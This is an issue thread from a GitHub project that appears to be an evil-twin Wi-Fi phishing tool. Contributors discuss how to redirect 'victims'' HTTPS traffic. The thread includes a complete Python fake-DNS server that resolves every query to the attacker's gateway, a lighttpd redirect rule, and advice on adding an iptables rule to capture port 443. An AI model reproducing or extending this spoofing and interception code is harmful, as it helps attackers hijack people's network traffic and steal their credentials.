### ISSUE TITLE
DNS Bug

### ISSUE THREAD

**Issue by deltaxflux** [deltaxflux/flux#11]
It don't redirect HTTPS Traffic to the DHCPD Server.Sometime interface is bussy

**Comment by strasharo** [comment]
Could you, please, be more specific? The title states that there an issue with DNS and in the description you have HTTPS and DHCPD. I'm not able to understand what's the exact issue. Thank you.

**Comment by deltaxflux** [comment]
Ok i will edit the post

**Comment by deltaxflux** [comment]
I mean this part of the code won´t work on HTTPS traffic
So we should edit this part. I want to look if there is any code avaible who support https traffic 
Because the most of the victims use https traffic e.g. https://www.google.com
I post the problem in hackerforum.net because there are loots of developer i hope who will help us 
2 of them want to support fluxion

# that redirects all DNS requests to the gateway
echo "import socket

class DNSQuery:
  def __init__(self, data):
    self.data=data
    self.dominio=''

    tipo = (ord(data[2]) >> 3) & 15   
    if tipo == 0:                    
      ini=12
      lon=ord(data[ini])
      while lon != 0:
	self.dominio+=data[ini+1:ini+lon+1]+'.'
	ini+=lon+1
	lon=ord(data[ini])

  def respuesta(self, ip):
    packet=''
    if self.dominio:
      packet+=self.data[:2] + \"\x81\x80\"
      packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'   
      packet+=self.data[12:]                                         
      packet+='\xc0\x0c'                                             
      packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'             
      packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) 
    return packet

if __name__ == '__main__':
  ip='$IP'
  print 'pyminifakeDNS:: dom.query. 60 IN A %s' % ip

  udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  udps.bind(('',53))
  
  try:
    while 1:
      data, addr = udps.recvfrom(1024)
      p=DNSQuery(data)
      udps.sendto(p.respuesta(ip), addr)
      print 'Request: %s -> %s' % (p.dominio, ip)
  except KeyboardInterrupt:
    print 'Finalizando'
    udps.close()
" >$DUMP_PATH/fakedns
chmod +x $DUMP_PATH/fakedns
}

**Comment by deltaxflux** [comment]
Look at thsi part:
$HTTP[\"host\"] =~ \"^www\.(.*)$\" {
url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" )
}

**Comment by strasharo** [comment]
This has nothing to do with DNS
https://github.com/deltaxflux/flux/blob/master/kali/fluxion#L1475
This iptables rule is actually capturing all of the traffic to port 80 and redirects it to the local web server. 
If you want to capture https traffic, a rule for 443 has to be created as well.
